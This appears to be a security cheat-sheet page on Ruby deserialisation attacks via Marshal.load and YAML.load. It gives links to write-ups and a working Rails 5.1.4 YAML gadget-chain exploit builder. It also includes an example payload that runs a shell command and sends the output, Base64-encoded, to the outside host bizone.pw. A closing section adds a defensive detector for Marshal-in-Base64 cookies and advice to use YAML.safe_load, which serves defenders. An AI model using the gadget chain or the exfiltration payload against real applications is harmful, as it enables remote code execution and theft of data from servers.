Deserialisation
Write-up on GitHub about deserialization in Ruby: https://github.com/httpvoid/writeups/blob/main/Ruby-deserialization-gadget-on-rails.md
Marshal.load(<user_input>) = RCE
Ruby Marshal+Base64 RCE payload playground/generator: https://repl.it/@allyshka/Ruby-RCE-with-Marshalload
Other guide: https://www.elttam.com/blog/ruby-deserialization/
YAML.load(<user_input>) = RCE
Rails 5.1.4 YAML unsafe deserialization RCE payload
Example: https://gist.github.com/niklasb/df9dba3097df536820888aeb4de3284f
Definitely works on Rails 5.1.4
```ruby
require "erb"
require "base64"
require "active_support"

if ARGV.empty?
  puts "Usage: exploit_builder.rb <source_file>"
  exit!
end

# ERB instance whose @src is the Ruby code from the given file;
# calling #result on it evaluates that code
erb = ERB.allocate
erb.instance_variable_set :@src, File.read(ARGV.first)
erb.instance_variable_set :@lineno, 1

# Proxy that calls erb.result when any method is invoked on it
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr))

# YAML gadget chain: the Gem::Requirement's SessionHash is loaded from a
# Rack::Session::Cookie store whose coder is Base64+Marshal, so the cookie
# value above is Marshal.load'ed
puts <<-PAYLOAD
--- !ruby/object:Gem::Requirement
requirements:
  - !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
      env:
        rack.session: !ruby/object:Rack::Session::Abstract::SessionHash
          loaded: true
        HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
      key: a
      secrets: []
    exists: true
PAYLOAD
```
Example payload (the `<source_file>` fed to the builder above):
```ruby
require "base64"
require "net/http"
require "uri"

out = `pwd`
url = URI.parse('http://bizone.pw')
# Send the command output, Base64-encoded, in the query string of a GET request
req = Net::HTTP::Get.new(url.to_s + '/?q=' + Base64.strict_encode64(out))
res = Net::HTTP.start(url.host, url.port) { |http|
  http.request(req)
}
```
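Defensive counterpart to both sinks on this page (`Marshal.load` and `YAML.load` on user input), added here as an example; it is not code from the page or from the linked write-ups. It shows how to recognise a Marshal stream hidden in a Base64 cookie before it reaches `Marshal.load`, and how `YAML.safe_load` refuses the `!ruby/object` tag that the gadget chain above relies on. The sample cookie and YAML inputs are constructed for the demo.

```ruby
require "base64"
require "yaml"

# Every Ruby Marshal stream starts with the format version 4.8, i.e. the
# two bytes 0x04 0x08 (Base64-encoded, the prefix shows up as "BAh").
MARSHAL_MAGIC = "\x04\x08".b

# True if the raw bytes look like a Marshal stream.
def marshal_stream?(bytes)
  bytes.to_s.b.start_with?(MARSHAL_MAGIC)
end

# Cookies and params carrying Marshal data are usually Base64-encoded,
# as in Rack::Session::Cookie::Base64::Marshal; decode (lenient, like
# Rack does) and check the magic bytes.
def marshal_in_base64?(value)
  marshal_stream?(Base64.decode64(value.to_s))
end

# Psych's safe loader only builds scalars, arrays and hashes; any
# !ruby/object tag raises Psych::DisallowedClass instead of instantiating
# the class. Returns [:ok, data] or [:rejected, message].
def load_yaml_safely(text)
  [:ok, YAML.safe_load(text)]
rescue Psych::DisallowedClass => e
  [:rejected, e.message]
end

# --- constructed sample inputs (not real traffic) ---
BENIGN_COOKIE  = Base64.strict_encode64("session=abc123")
MARSHAL_COOKIE = Base64.strict_encode64(Marshal.dump({ "user_id" => 1 }))
PLAIN_YAML     = "---\nname: app\nports: [80, 443]\n"
GADGET_YAML    = <<~YAML
  --- !ruby/object:Gem::Requirement
  requirements: []
YAML

if __FILE__ == $PROGRAM_NAME
  puts "benign cookie is Marshal?  #{marshal_in_base64?(BENIGN_COOKIE)}"   # => false
  puts "marshal cookie is Marshal? #{marshal_in_base64?(MARSHAL_COOKIE)}"  # => true
  p load_yaml_safely(PLAIN_YAML)   # => [:ok, {...}]
  p load_yaml_safely(GADGET_YAML)  # => [:rejected, "Tried to load unspecified class: Gem::Requirement"]
end
```

The magic-byte check is cheap enough to run in a Rack middleware or a WAF rule on every cookie value; a `"BAh"` prefix on a Base64 value is a strong signal that something on the server will hand it to `Marshal.load`. For YAML, use `YAML.safe_load` (with `permitted_classes:` only for classes you actually need); on Psych 4 (Ruby 3.1+) `YAML.load` already behaves like `safe_load` and the dangerous call is `YAML.unsafe_load`.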